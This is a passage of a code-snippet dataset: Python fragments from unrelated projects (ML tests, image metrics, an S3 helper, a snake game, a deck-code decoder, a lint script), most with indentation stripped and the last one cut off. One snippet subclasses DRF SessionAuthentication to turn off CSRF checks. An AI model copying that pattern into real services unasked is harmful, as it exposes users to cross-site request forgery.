| id | content |
|---|---|
455663
|
from math import sin, cos
import pytest
import numpy as np
from .._esn_online import ESNOnline
from reservoirpy.datasets import lorenz
@pytest.fixture(scope="session")
def matrices():
Win = np.array([[1, -1],
[-1, 1],
[1, -1],
[-1, -1]])
W = np.array([[0.0, 0.1, -0.1, 0.0],
[0.2, 0.0, 0.0, -0.2],
[0.0, 0.2, 0.3, 0.1],
[-0.1, 0.0, 0.0, 0.0]])
Wout = np.zeros((2, 4 + 1))
return W, Win, Wout
@pytest.fixture(scope="session")
def matrices_fb():
Win = np.array([[1, -1],
[-1, 1],
[1, -1],
[-1, -1]])
W = np.array([[0.0, 0.1, -0.1, 0.0],
[0.2, 0.0, 0.0, -0.2],
[0.0, 0.2, 0.3, 0.1],
[-0.1, 0.0, 0.0, 0.0]])
Wfb = np.array([[1, -1],
[-1, -1],
[1, 1],
[-1, 1]])
Wout = np.zeros((2, 4 + 1))
return W, Win, Wout, Wfb
@pytest.fixture(scope="session")
def dummy_data():
Xn0 = np.array([[sin(x), cos(x)] for x in np.linspace(0, 4*np.pi, 500)])
Xn1 = np.array([[sin(x), cos(x)]
for x in np.linspace(np.pi/4, 4*np.pi+np.pi/4, 500)])
return Xn0, Xn1
def test_esn(matrices, dummy_data):
W, Win, Wout = matrices
esn = ESNOnline(lr=0.1, W=W, Win=Win, dim_out=2, input_bias=False)
X, y = dummy_data
states = esn.train([X], [y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X])
assert states[0].shape[0] == X.shape[0]
assert outputs[0].shape[1] == y.shape[1]
states = esn.train([X, X, X], [y, y, y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X, X])
assert len(states) == 2
assert len(outputs) == 2
def test_esn_fb(matrices_fb, dummy_data):
W, Win, Wout, Wfb = matrices_fb
esn = ESNOnline(lr=0.1, W=W, Win=Win, Wfb=Wfb,
dim_out=2, input_bias=False,
fbfunc=np.tanh)
X, y = dummy_data
states = esn.train([X], [y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X])
assert states[0].shape[0] == X.shape[0]
assert outputs[0].shape[1] == y.shape[1]
states = esn.train([X, X, X], [y, y, y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X, X])
assert len(states) == 2
assert len(outputs) == 2
|
455687
|
import numpy as np
from skimage.transform import resize
heatmap_1_r = resize(heatmap_1, (50,80), mode='reflect',
preserve_range=True, anti_aliasing=True)
heatmap_2_r = resize(heatmap_2, (50,80), mode='reflect',
preserve_range=True, anti_aliasing=True)
heatmap_3_r = resize(heatmap_3, (50,80), mode='reflect',
preserve_range=True, anti_aliasing=True)
heatmap_geom_avg = np.power(heatmap_1_r * heatmap_2_r * heatmap_3_r, 0.333)
display_img_and_heatmap("dog.jpg", heatmap_geom_avg)
|
455698
|
import logging
import boto3
from botocore.exceptions import ClientError
def download_file(dest_bucket_name, dest_file_key):
"""Fetch an file to an Amazon S3 bucket
The src_data argument must be of type bytes or a string that references
a file specification.
:param dest_bucket_name: string
:param dest_file_key: string
:return: download path if get the file successfully, otherwise
False
"""
# get the file
s3 = boto3.client('s3')
download_path = '/tmp/{}'.format(dest_file_key)
try:
s3.download_file(dest_bucket_name, dest_file_key, download_path)
except ClientError as e:
# AllAccessDisabled error == bucket not found
# NoSuchKey or InvalidRequest error == (dest bucket/obj == src bucket/obj)
logging.error(e)
return False
return download_path
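# A minimal usage sketch (hypothetical bucket and key names; assumes AWS
# credentials are configured in the environment). It shows how the helper
# above might be called, e.g. from a Lambda handler.
def example_download():
    path = download_file('my-example-bucket', 'reports/latest.csv')
    if path is False:
        logging.error('download failed')
    else:
        logging.info('file saved to %s', path)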
|
455699
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
import tensorflow as tf
import magenta.models.melody_rnn.melody_rnn_create_dataset as md
import scripts.target as tgt
def main(unused_argv):
tf.logging.set_verbosity(md.FLAGS.log)
config = md.melody_rnn_config_flags.config_from_flags()
pipeline_instance = md.get_pipeline(config, md.FLAGS.eval_ratio)
md.pipeline.run_pipeline_serial(
pipeline_instance,
md.pipeline.tf_record_iterator(tgt.SEQUENCE_FILE, pipeline_instance.input_type),
tgt.OUTPUT_DIR)
def console_entry_point():
tf.app.run(main)
if __name__ == "__main__":
console_entry_point()
|
455711
|
from rest_framework.authentication import SessionAuthentication
class CsrfExemptSessionAuthentication(SessionAuthentication):
def enforce_csrf(self, request):
return
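# A hedged usage sketch: wiring the CSRF-exempt session authentication into a
# DRF view. The view name is hypothetical; only CsrfExemptSessionAuthentication
# comes from the code above.
from rest_framework.authentication import BasicAuthentication
from rest_framework.views import APIView
from rest_framework.response import Response


class ExampleView(APIView):
    # Session auth without CSRF enforcement, plus HTTP basic auth as a fallback
    authentication_classes = (CsrfExemptSessionAuthentication, BasicAuthentication)

    def post(self, request):
        return Response({'ok': True})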
|
455725
|
import json
import os
import pickle
import ulmo
import param
import pandas as pd
import geopandas as gpd
from shapely.geometry import box, Point
from quest import util
reserved_catalog_entry_fields = [
'name',
'service',
'service_id',
'publisher_id',
'display_name',
'description',
'reserved',
'geometry',
'parameters',
]
reserved_geometry_fields = [
'latitude',
'longitude',
'geom_type',
'latitudes',
'longitudes',
'bbox',
]
reserved_catalog_entry_fields.extend(reserved_geometry_fields)
class ServiceBase(param.Parameterized): # TODO can I make this an abc and have it be Parameterized?
"""Base class for data providers
"""
service_name = None
display_name = None
description = None
service_type = None
unmapped_parameters_available = None
geom_type = None
datatype = None
geographical_areas = None
bounding_boxes = None
_parameter_map = None
# name = param.String(default='Service', precedence=-1)
def __init__(self, provider, **kwargs):
self.provider = provider
super(ServiceBase, self).__init__(**kwargs)
@property
def title(self):
return '{} Download Options'.format(self.display_name)
@property
def use_cache(self):
return self.provider.use_cache
@property
def metadata(self):
return {
'display_name': self.display_name,
'description': self.description,
'service_type': self.service_type,
'parameters': list(self._parameter_map.values()),
'unmapped_parameters_available': self.unmapped_parameters_available,
'geom_type': self.geom_type,
'datatype': self.datatype,
'geographical_areas': self.geographical_areas,
'bounding_boxes': self.bounding_boxes
}
@property
def parameters(self):
return {
'parameters': list(self._parameter_map.values()),
'parameter_codes': list(self._parameter_map.keys())
}
@property
def parameter_code(self):
if hasattr(self, 'parameter'):
pmap = self.parameter_map(invert=True)
return pmap[self.parameter]
def parameter_map(self, invert=False):
pmap = self._parameter_map
if pmap is None:
raise NotImplementedError()
if invert:
pmap = {v: k for k, v in pmap.items()}
return pmap
def get_parameters(self, catalog_ids=None):
"""Default function that should be overridden if the catalog_ids argument needs to be handled."""
return self.parameters
def get_download_options(self, fmt):
"""
needs to return dictionary
eg. {'path': /path/to/dir/or/file, 'format': 'raster'}
"""
if fmt == 'param':
schema = self
elif fmt == 'json':
schema = util.format_json_options(self)
else:
raise ValueError('{} is an unrecognized format.'.format(fmt))
return schema
def download(self, catalog_id, file_path, dataset, **kwargs):
raise NotImplementedError()
def search_catalog_wrapper(self, update_cache=False, **kwargs):
"""Get catalog_entries associated with service.
Take a series of query parameters and return a list of
locations as a geojson python dictionary
"""
cache_file = os.path.join(util.get_cache_dir(self.provider.name), self.name + '_catalog.p')
if self.use_cache and not update_cache:
try:
catalog_entries = pd.read_pickle(cache_file)
self._label_catalog_entries(catalog_entries)
# convert to GeoPandas GeoDataFrame
catalog_entries = gpd.GeoDataFrame(catalog_entries, geometry='geometry')
return catalog_entries
except Exception as e:
util.logger.info(e)
util.logger.info('updating cache')
catalog_entries = self.search_catalog(**kwargs)
# convert geometry into shapely objects
if 'bbox' in catalog_entries.columns:
catalog_entries['geometry'] = catalog_entries['bbox'].apply(lambda row: box(*[float(x) for x in row]))
del catalog_entries['bbox']
if {'latitude', 'longitude'}.issubset(catalog_entries.columns):
def fn(row):
return Point((
float(row['longitude']),
float(row['latitude'])
))
catalog_entries['geometry'] = catalog_entries.apply(fn, axis=1)
del catalog_entries['latitude']
del catalog_entries['longitude']
if {'geom_type', 'latitudes', 'longitudes'}.issubset(catalog_entries.columns):
# TODO handle this case or remove from reserved fields and docs
pass
# del catalog_entries['geom_type']
# del catalog_entries['latitude']
# del catalog_entries['longitude']
if 'geometry' in catalog_entries.columns:
pass
# The following line doesn't have any effect (except perhaps to validate the geometry)
# catalog_entries['geometry'].apply(shape)
if 'geometry' not in catalog_entries.columns:
catalog_entries['geometry'] = None
# add defaults values
if 'display_name' not in catalog_entries.columns:
catalog_entries['display_name'] = catalog_entries.index
if 'description' not in catalog_entries.columns:
catalog_entries['description'] = ''
# merge extra data columns/fields into metadata as a dictionary
extra_fields = list(set(catalog_entries.columns.tolist()) - set(reserved_catalog_entry_fields))
# change NaN to None so it can be JSON serialized properly
catalog_entries['metadata'] = json.loads(catalog_entries[extra_fields].to_json(orient='records'))
catalog_entries.drop(extra_fields, axis=1, inplace=True)
columns = list(set(catalog_entries.columns.tolist()).intersection(reserved_geometry_fields))
catalog_entries.drop(columns, axis=1, inplace=True)
params = self.get_parameters(catalog_ids=catalog_entries)
if isinstance(params, pd.DataFrame):
groups = params.groupby('service_id').groups
catalog_entries['parameters'] = catalog_entries.index.map(
lambda x: ','.join(filter(None, params.loc[groups[x]]['parameter'].tolist()))
if x in groups.keys() else ''
)
else:
catalog_entries['parameters'] = ','.join(params['parameters'])
if self.use_cache:
# write to cache_file
os.makedirs(os.path.split(cache_file)[0], exist_ok=True)
catalog_entries.to_pickle(cache_file)
self._label_catalog_entries(catalog_entries)
# convert to GeoPandas GeoDataFrame
catalog_entries = gpd.GeoDataFrame(catalog_entries, geometry='geometry')
return catalog_entries
def _label_catalog_entries(self, catalog_entries):
catalog_entries['service'] = util.construct_service_uri(self.provider.name, self.name)
if 'service_id' not in catalog_entries:
catalog_entries['service_id'] = catalog_entries.index
catalog_entries['service_id'] = catalog_entries['service_id'].apply(str)
catalog_entries.index = catalog_entries['service'] + '/' + catalog_entries['service_id']
catalog_entries['name'] = catalog_entries.index
def search_catalog(self, **kwargs):
"""
should return a pandas dataframe or a python dictionary with
indexed by catalog_entry uid and containing the following columns
reserved column/field names
display_name -> will be set to uid if not provided
description -> will be set to '' if not provided
download_url -> optional download url
defining geometry options:
1) geometry -> geojson string or shapely object
2) latitude & longitude columns/fields
3) geometry_type, latitudes, longitudes columns/fields
4) bbox column/field -> tuple with order (lon min, lat min, lon max, lat max)
all other columns/fields will be accumulated in a dict and placed
in a metadata field.
:param **kwargs:
"""
raise NotImplementedError()
def get_tags(self, update_cache=False):
cache_file = os.path.join(util.get_cache_dir(self.provider.name), self.name + '_tags.p')
if self.use_cache and not update_cache:
try:
with open(cache_file, 'rb') as cache:
tags = pickle.load(cache)
return tags
except:
util.logger.info('updating tag cache')
catalog_entries = self.search_catalog_wrapper(update_cache=update_cache)
metadata = pd.DataFrame(list(catalog_entries.metadata))
# drop metadata fields that are unusable as tag fields
metadata.drop(labels=['location', 'coverages'], axis=1, inplace=True, errors='ignore')
tags = {}
for tag in metadata.columns:
try:
tags[tag] = list(metadata[tag].unique())
# make sure datetime values are serialized (for RPC server)
tags[tag] = json.loads(json.dumps(tags[tag], default=util.to_json_default_handler))
except TypeError:
values = list(metadata[tag])
new_tags = dict()
new_tags[tag] = list()
for v in values:
if isinstance(v, dict):
self._combine_dicts(new_tags, self._get_tags_from_dict(tag, v))
else:
new_tags[tag].append(v)
if not new_tags[tag]:
del new_tags[tag]
tags.update({k: list(set(v)) for k, v in new_tags.items()})
if self.use_cache:
# write to cache_file
with open(cache_file, 'wb') as cache:
pickle.dump(tags, cache)
return tags
def _get_tags_from_dict(self, tag, d):
"""Helper function for `get_tags` to recursively parse dicts and add them as multi-indexed tags
"""
tags = dict()
for k, v in d.items():
new_tag = '{}:{}'.format(tag, k)
if isinstance(v, dict):
self._combine_dicts(tags, self._get_tags_from_dict(new_tag, v))
else:
tags[new_tag] = v
return tags
def _combine_dicts(self, this, other):
"""Helper function for `get_tags` to combine dictionaries by aggregating values rather than overwriting them.
"""
for k, other_v in other.items():
other_v = util.listify(other_v)
if k in this:
this_v = this[k]
if isinstance(this_v, list):
other_v.extend(this_v)
else:
other_v.append(this_v)
this[k] = other_v
class TimePeriodServiceBase(ServiceBase):
start = param.Date(default=None, precedence=2, doc='start date')
end = param.Date(default=None, precedence=3, doc='end date')
@property
def start_string(self):
return self.start.strftime('%Y-%m-%d')
@property
def end_string(self):
return self.end.strftime('%Y-%m-%d')
# abc
class SingleFileServiceBase(ServiceBase):
"""Base file for datasets that are a single file download
eg elevation raster etc
"""
def download(self, catalog_id, file_path, dataset, **kwargs):
service_uri = util.construct_service_uri(self.provider.name, self.name, catalog_id)
catalog_id = self.provider.search_catalog(self.name).loc[service_uri]
reserved = catalog_id.get('reserved')
download_url = reserved['download_url']
fmt = reserved.get('extract_from_zip', '')
filename = reserved.get('filename', util.uuid('dataset'))
file_path = self._download_file(file_path, download_url, fmt, filename)
return {
'file_path': file_path,
'file_format': reserved.get('file_format'),
'parameter': catalog_id.get('parameters'),
'datatype': self.datatype,
}
def _download_file(self, path, url, tile_fmt, filename, check_modified=False):
os.makedirs(path, exist_ok=True)
os.makedirs(os.path.join(path, 'zip'), exist_ok=True)
tile_path = os.path.join(path, filename)
util.logger.info('... downloading %s' % url)
if tile_fmt == '':
ulmo.util.download_if_new(url, tile_path, check_modified=check_modified)
else:
zip_path = os.path.join(path, 'zip', filename)
ulmo.util.download_if_new(url, zip_path, check_modified=check_modified)
util.logger.info('... ... zipfile saved at %s' % zip_path)
tile_path = ulmo.util.extract_from_zip(zip_path, tile_path, tile_fmt)
return tile_path
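# A minimal sketch of a concrete provider built on the ServiceBase interface
# defined above. The service name, parameter codes, stations and coordinates
# are hypothetical; a real provider would query its upstream API in
# search_catalog and implement download as well.
class ExampleStationService(ServiceBase):
    service_name = 'example-stations'
    display_name = 'Example Stations'
    description = 'Hypothetical point-data service used for illustration.'
    service_type = 'geo-discrete'
    geom_type = 'Point'
    datatype = 'timeseries'
    unmapped_parameters_available = False
    _parameter_map = {
        '00060': 'streamflow',
        '00065': 'gage_height',
    }

    def search_catalog(self, **kwargs):
        # latitude/longitude columns are one of the reserved geometry options;
        # everything else ends up in the metadata field.
        return pd.DataFrame({
            'display_name': ['Station A', 'Station B'],
            'latitude': [35.1, 36.2],
            'longitude': [-106.6, -105.9],
            'operator': ['example', 'example'],
        }, index=['sta-a', 'sta-b'])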
|
455756
|
import game_config
from game_config import Position
import copy
class Snake(object):
def __init__(self) -> None:
self.window_size = Position(game_config.game_sizes["width"], game_config.game_sizes["height"])
self.direction = game_config.D_Down
self.body = []
self.last_body = []
for i in range(3):
self.body.append(Position(2, 3 - i))
def reset(self) -> None:
self.direction = game_config.D_Down
self.body = []
self.last_body = []
for i in range(3):
self.body.append(Position(2, 3 - i))
def get_dis_inc_factor(self) -> Position:
dis_increment_factor = Position(0, 0)
# set the per-axis displacement for the current direction
if self.direction == game_config.D_Up:
dis_increment_factor.y = -1
elif self.direction == game_config.D_Down:
dis_increment_factor.y = 1
elif self.direction == game_config.D_Left:
dis_increment_factor.x = -1
elif self.direction == game_config.D_Right:
dis_increment_factor.x = 1
return dis_increment_factor
def update_snake_pos(self) -> None:
dis_increment_factor = self.get_dis_inc_factor()
self.last_body = copy.deepcopy(self.body)
for index, item in enumerate(self.body):
if index < 1:
item.x += dis_increment_factor.x
item.y += dis_increment_factor.y
else: # the remaining segments follow the segment in front of them
item.x = self.last_body[index - 1].x
item.y = self.last_body[index - 1].y
def check_alive(self) -> bool: # check whether the snake has died
flag1 = self.check_eat_self()
flag2 = self.check_hit_wall()
return not (flag1 or flag2)
def eat_food(self, food) -> None:
self.body.append(self.last_body[-1]) # grow by one segment
def check_eat_food(self, foods: list) -> int: # return the index of the food that was eaten, or -1
for index, food in enumerate(foods):
if food == self.body[0]:
self.eat_food(food)
foods.pop(index)
return index
return -1
def check_eat_self(self) -> bool:
return self.body[0] in self.body[1:] # check whether the head overlaps any body segment
def check_hit_wall(self) -> bool:
is_between_top_bottom = self.window_size.y - 1 > self.body[0].y > 0
is_between_left_right = self.window_size.x - 1 > self.body[0].x > 0
return not (is_between_top_bottom and is_between_left_right)
def is_valid_position(self, pos: Position) -> bool:
# I considered using this function to replace the self-collision and wall checks, but keeping them separate seems cleaner
flag1 = not (pos in self.body)
flag2 = self.window_size.y - 1 > pos.y > 0 and \
self.window_size.x - 1 > pos.x > 0
return flag1 and flag2
def get_relative_direction(self, pos1: Position, pos2: Position) -> int:
# returns which side of pos2 pos1 is on (up/down/left/right)
# assumes the two points share a row or a column
x_inc = pos1.x - pos2.x
y_inc = pos1.y - pos2.y
if 0 != x_inc and 0 != y_inc:
raise ValueError
if x_inc > 0:
return game_config.D_Right
elif x_inc < 0:
return game_config.D_Left
elif y_inc > 0:
return game_config.D_Down
elif y_inc < 0:
return game_config.D_Up
raise ValueError
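# A short illustrative driver, assuming game_config defines Position and the
# D_Up/D_Down/D_Left/D_Right constants used above. It advances the snake a few
# steps and reacts to food and collisions.
def example_game_loop():
    snake = Snake()
    foods = [Position(2, 6)]
    for _ in range(5):
        snake.update_snake_pos()
        eaten = snake.check_eat_food(foods)
        if eaten != -1:
            print('ate food', eaten, 'length is now', len(snake.body))
        if not snake.check_alive():
            print('game over')
            break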
|
455773
|
from io import BytesIO
from typing import List
from lor_deckcodes.utils import next_varint, decode_base32
from lor_deckcodes.constants import faction_mapping, CURRENT_FORMAT_VERSION, SUPPORTED_VERSIONS
def _decode_card_block(n: int, data_stream: BytesIO) -> List[str]:
card_block_list = []
n_card_copies = next_varint(data_stream)
for copies in range(n_card_copies):
n_cards = next_varint(data_stream)
set_number = next_varint(data_stream)
faction = next_varint(data_stream)
for card in range(n_cards):
card_block_list.append(f'{n}:{set_number:02}{faction_mapping.get(faction)}{next_varint(data_stream):03}')
return card_block_list
def _decode_event_card_block(data_stream: BytesIO) -> List[str]:
n_card_copies = next_varint(data_stream)
set_number = next_varint(data_stream)
faction = next_varint(data_stream)
num = next_varint(data_stream)
return [f'{n_card_copies}:{set_number:02}{faction_mapping.get(faction)}{num:03}']
def decode_deck(deckcode: str):
all_cards = []
decoded = decode_base32(deckcode)
data = BytesIO(decoded)
if next_varint(data) not in SUPPORTED_VERSIONS:
raise ValueError("Version/Format not supported.")
# 3 card copies
all_cards.extend(_decode_card_block(3, data))
# 2 card copies
all_cards.extend(_decode_card_block(2, data))
# 1 card copy
all_cards.extend(_decode_card_block(1, data))
# 4+ card copies (Events only)
while True:
try:
all_cards.extend(_decode_event_card_block(data))
except EOFError:
break
return all_cards
|
455804
|
import os, subprocess, sys, getopt
from subprocess import run
def find_cppcheck():
drive_letters = ['C', 'D']
for drive_letter in drive_letters:
cppcheck_path = drive_letter + r":\Program Files\Cppcheck\cppcheck.exe"
if os.path.isfile(cppcheck_path):
return cppcheck_path
print('Failed to find cppcheck.exe')
sys.exit(1)
def lint(cppcheck_path, report_path, ignore_path):
args = [
cppcheck_path,
'--enable=all',
'--platform=win64',
'--template={callstack}: ({severity}) {message}',
'--inconclusive',
'-q',
'--project=LambdaEngine.sln',
'--project-configuration=Release|x64'
]
if ignore_path:
args.append(f'-i{ignore_path}')
thread_count = min(os.cpu_count(), 8)
if thread_count:
print(f'Using {thread_count} threads')
args.append(f'-j{thread_count}')
# Use stderr as the report; cppcheck writes its findings to stderr
with open(report_path, 'w') as report:
print('Linting... ', flush=True, end='')
# Discard cppcheck's stdout
subprocess.run(args, stdout=subprocess.DEVNULL, stderr=report)
print('Finished', flush=True)
report.close()
def main(argv):
report_path = None
ignore_path = None
helpStr = '''usage: generate-lint-report.py -o <path> -i <dir>\n
-o: path in which to store lint report\n
-i: file or directory to ignore when linting. Wildcards are allowed, eg: \'-i src/*\''''
try:
opts, args = getopt.getopt(argv, "hi:o:", ["help"])
except getopt.GetoptError:
print("Intended usage:")
print(helpStr)
print(f"Used flags: {str(args)}")
sys.exit(1)
for opt, arg in opts:
if opt == "-h":
print(helpStr)
sys.exit(1)
elif opt == "-o":
report_path = arg
elif opt == "-i":
ignore_path = arg
if not report_path:
print(helpStr)
sys.exit(1)
cppcheck_path = find_cppcheck()
lint(cppcheck_path, report_path, ignore_path)
sys.exit(0)
if __name__ == "__main__":
main(sys.argv[1:])
|
455835
|
r"""Assorted function for use when computing metrics and evals."""
import collections
import os
import numpy as np
import scipy
from scipy import signal
from scipy.ndimage.filters import convolve
import tensorflow.compat.v1 as tf
def _FSpecialGauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
radius = size // 2
offset = 0.0
start, stop = -radius, radius + 1
if size % 2 == 0:
offset = 0.5
stop -= 1
x, y = np.mgrid[offset + start:stop, offset + start:stop]
assert len(x) == size
g = np.exp(-((x**2 + y**2)/(2.0 * sigma**2)))
return g / g.sum()
def fspecial_gauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
radius = size // 2
offset = 0.0
start, stop = -radius, radius + 1
if size % 2 == 0:
offset = 0.5
stop -= 1
x, y = np.mgrid[offset + start:stop, offset + start:stop]
assert len(x) == size
g = np.exp(-((x**2 + y**2)/(2.0 * sigma**2)))
return g / g.sum()
def ssim(img1, img2, max_val=255, filter_size=11,
filter_sigma=1.5, k1=0.01, k2=0.03, mask=None):
"""Original code here: https://github.com/tensorflow/models/blob/f87a58cd96d45de73c9a8330a06b2ab56749a7fa/research/compression/image_encoder/msssim.py
Return the Structural Similarity Map between `img1` and `img2`.
This function attempts to match the functionality of ssim_index_new.m by
<NAME>: http://www.cns.nyu.edu/~lcv/ssim/msssim.zip
Arguments:
img1: Numpy array holding the first RGB image batch.
img2: Numpy array holding the second RGB image batch.
max_val: the dynamic range of the images (i.e., the difference between the
maximum and minimum allowed values).
filter_size: Size of blur kernel to use (will be reduced for small images).
filter_sigma: Standard deviation for Gaussian blur kernel (will be reduced
for small images).
k1: Constant used to maintain stability in the SSIM calculation (0.01 in
the original paper).
k2: Constant used to maintain stability in the SSIM calculation (0.03 in
the original paper).
mask: Optional weighting mask applied when averaging the SSIM map.
Returns:
The mean SSIM between `img1` and `img2` (weighted by `mask` if provided).
Raises:
RuntimeError: If input images don't have the same shape or don't have four
dimensions: [batch_size, height, width, depth].
"""
if img1.shape != img2.shape:
raise RuntimeError("Input images must have the same shape (%s vs. %s).",
img1.shape, img2.shape)
if img1.ndim == 3:
img1 = np.expand_dims(img1, 0)
if img2.ndim == 3:
img2 = np.expand_dims(img2, 0)
if img1.ndim != 4:
raise RuntimeError(
"Input images must have four dimensions, not %d" % img1.ndim)
img1 = img1.astype(np.float64)
img2 = img2.astype(np.float64)
_, height, width, _ = img1.shape
# Filter size can't be larger than height or width of images.
size = min(filter_size, height, width)
# Scale down sigma if a smaller filter size is used.
sigma = size * filter_sigma / filter_size if filter_size else 0
if filter_size:
window = np.reshape(fspecial_gauss(size, sigma), (1, size, size, 1))
mu1 = signal.fftconvolve(img1, window, mode="same")
mu2 = signal.fftconvolve(img2, window, mode="same")
sigma11 = signal.fftconvolve(img1 * img1, window, mode="same")
sigma22 = signal.fftconvolve(img2 * img2, window, mode="same")
sigma12 = signal.fftconvolve(img1 * img2, window, mode="same")
else:
# Empty blur kernel so no need to convolve.
mu1, mu2 = img1, img2
sigma11 = img1 * img1
sigma22 = img2 * img2
sigma12 = img1 * img2
mu11 = mu1 * mu1
mu22 = mu2 * mu2
mu12 = mu1 * mu2
sigma11 -= mu11
sigma22 -= mu22
sigma12 -= mu12
# Calculate intermediate values used by both ssim and cs_map.
c1 = (k1 * max_val) ** 2
c2 = (k2 * max_val) ** 2
v1 = 2.0 * sigma12 + c2
v2 = sigma11 + sigma22 + c2
if mask is not None:
score = (((2.0 * mu12 + c1) * v1) / ((mu11 + mu22 + c1) * v2))
score = np.sum(mask * score) / (np.sum(mask*np.ones_like(score)))
else:
score = np.mean((((2.0 * mu12 + c1) * v1) / ((mu11 + mu22 + c1) * v2)))
# cs = np.mean(v1 / v2)
return score
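# A small self-check sketch for the SSIM helper above: identical images score
# ~1.0, and adding noise lowers the score. It uses random data, so no real
# images or files are assumed.
def _example_ssim():
    rng = np.random.RandomState(0)
    img = rng.randint(0, 256, size=(1, 64, 64, 3)).astype(np.float64)
    noisy = np.clip(img + rng.normal(0, 25, size=img.shape), 0, 255)
    print('ssim(img, img)   =', ssim(img, img))     # ~1.0
    print('ssim(img, noisy) =', ssim(img, noisy))   # < 1.0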
def load_lpips():
"""Return a function to compute the LPIPS distance between two images.
Returns:
distance: a function that takes two images [H, W, C] scaled from 0 to 1, and
returns the LPIPS distance between them.
"""
graph = tf.compat.v1.Graph()
session = tf.compat.v1.Session(graph=graph)
with graph.as_default():
input1 = tf.compat.v1.placeholder(tf.float32, [None, None, 3])
input2 = tf.compat.v1.placeholder(tf.float32, [None, None, 3])
with tf.gfile.Open('alex_net.pb', 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
# Required order for network is [B, C, H, W].
target = tf.transpose((input1[tf.newaxis] * 2.0) - 1.0, [0, 3, 1, 2])
pred = tf.transpose((input2[tf.newaxis] * 2.0) - 1.0, [0, 3, 1, 2])
tf.import_graph_def(
graph_def, input_map={'0:0':target, '1:0':pred})
distance = graph.get_operations()[-1].outputs[0]
def lpips_distance(img1, img2):
with graph.as_default():
return session.run(distance, {input1:img1, input2:img2})[0, 0, 0, 0]
return lpips_distance
|
455875
|
from sys import platform
import sys
try:
import caffe
except ImportError:
print("This sample can only be run if Python Caffe if available on your system")
print("Currently OpenPose does not compile Python Caffe. This may be supported in the future")
sys.exit(-1)
import os
os.environ["GLOG_minloglevel"] = "1"
import caffe
import cv2
import numpy as np
import sys
import time
dir_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append('../../python')
dir_path + "/../../models/"
try:
from openpose import OpenPose
except:
raise Exception('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` in CMake and have this Python script in the right folder?')
# Params for change
defRes = 736
scales = [1,0.5]
class Param:
caffemodel = dir_path + "/../../../models/pose/body_25/pose_iter_584000.caffemodel"
prototxt = dir_path + "/../../../models/pose/body_25/pose_deploy.prototxt"
# Load OpenPose object and Caffe Nets
params = dict()
params["logging_level"] = 3
params["output_resolution"] = "-1x-1"
params["net_resolution"] = "-1x"+str(defRes)
params["model_pose"] = "BODY_25"
params["alpha_pose"] = 0.6
params["scale_gap"] = 0.5
params["scale_number"] = len(scales)
params["render_threshold"] = 0.05
params["num_gpu_start"] = 0
params["disable_blending"] = False
params["default_model_folder"] = dir_path + "/../../../models/"
openpose = OpenPose(params)
caffe.set_mode_gpu()
caffe.set_device(0)
nets = []
for scale in scales:
nets.append(caffe.Net(Param.prototxt, Param.caffemodel, caffe.TEST))
print("Net loaded")
# Test Function
first_run = True
def func(frame):
# Get image processed for network, and scaled image
imagesForNet, imagesOrig = OpenPose.process_frames(frame, defRes, scales)
# Reshape
global first_run
if first_run:
for i in range(0, len(scales)):
net = nets[i]
imageForNet = imagesForNet[i]
in_shape = net.blobs['image'].data.shape
in_shape = (1, 3, imageForNet.shape[1], imageForNet.shape[2])
net.blobs['image'].reshape(*in_shape)
net.reshape()
first_run = False
print("Reshaped")
# Forward pass to get heatmaps
heatmaps = []
for i in range(0, len(scales)):
net = nets[i]
imageForNet = imagesForNet[i]
net.blobs['image'].data[0,:,:,:] = imageForNet
net.forward()
heatmaps.append(net.blobs['net_output'].data[:,:,:,:])
# Pose from HM Test
array, frame = openpose.poseFromHM(frame, heatmaps, scales)
# Draw Heatmaps instead
#hm = heatmaps[0][:,0:18,:,:]; frame = OpenPose.draw_all(imagesOrig[0], hm, -1, 1, True)
#paf = heatmaps[0][:,20:,:,:]; frame = OpenPose.draw_all(imagesOrig[0], paf, -1, 4, False)
return frame
img = cv2.imread(dir_path + "/../../../examples/media/COCO_val2014_000000000192.jpg")
frame = func(img)
while 1:
cv2.imshow("output", frame)
cv2.waitKey(15)
|
455907
|
from InstruccionesPL.TablaSimbolosPL.InstruccionPL import InstruccionPL
from InstruccionesPL.IndicesPL import IndicePL1, IndicePL7, IndicePL8, IndicePL9, IndicePLUnique, IndicePLUsing, IndicePLUsingNull
from InstruccionesPL.Expresiones import PrimitivoPL
class AlterIndice(InstruccionPL):
def __init__(self, nombre, columnaActual, columnaNueva, tipo, linea, columna, strGram ):
InstruccionPL.__init__(self, tipo, linea, columna, strGram)
self.nombre = nombre
self.columnaActual = columnaActual
self.columnaNueva =columnaNueva
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla, arbol)
arbol.modificarIndice(self.nombre, self.columnaActual, self.columnaNueva)
def traducir(self, tabla, arbol):
super().traducir(tabla, arbol)
|
455913
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributions as D
from base import BaseModel
EPSILON = 1e-30
class GraphVAE(BaseModel):
def __init__(self, input_dim, n_nodes, node_dim):
super(GraphVAE, self).__init__()
# store parameters
self.input_dim = input_dim
self.n_nodes = n_nodes
self.node_dim = node_dim
# encoder: x -> h_x
self.encoder = nn.Sequential(
nn.Linear(input_dim, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, 256),
nn.BatchNorm1d(256),
nn.ELU(),
nn.Linear(256, 128)
)
# bottom-up inference: predicts parameters of P(z_i | x)
self.bottom_up = nn.ModuleList([
nn.Sequential(
nn.Linear(128, 128),
nn.BatchNorm1d(128),
nn.ELU(),
nn.Linear(128, node_dim),
nn.Linear(node_dim, 2*node_dim) # split into mu and pre-softplus sigma
)
for _ in range(n_nodes-1)]) # ignore z_n
# top-down inference: predicts parameters of P(z_i | Pa(z_i))
self.top_down = nn.ModuleList([
nn.Sequential(
nn.Linear((n_nodes - i - 1)*node_dim, 128), # parents of z_i are z_{i+1} ... z_N
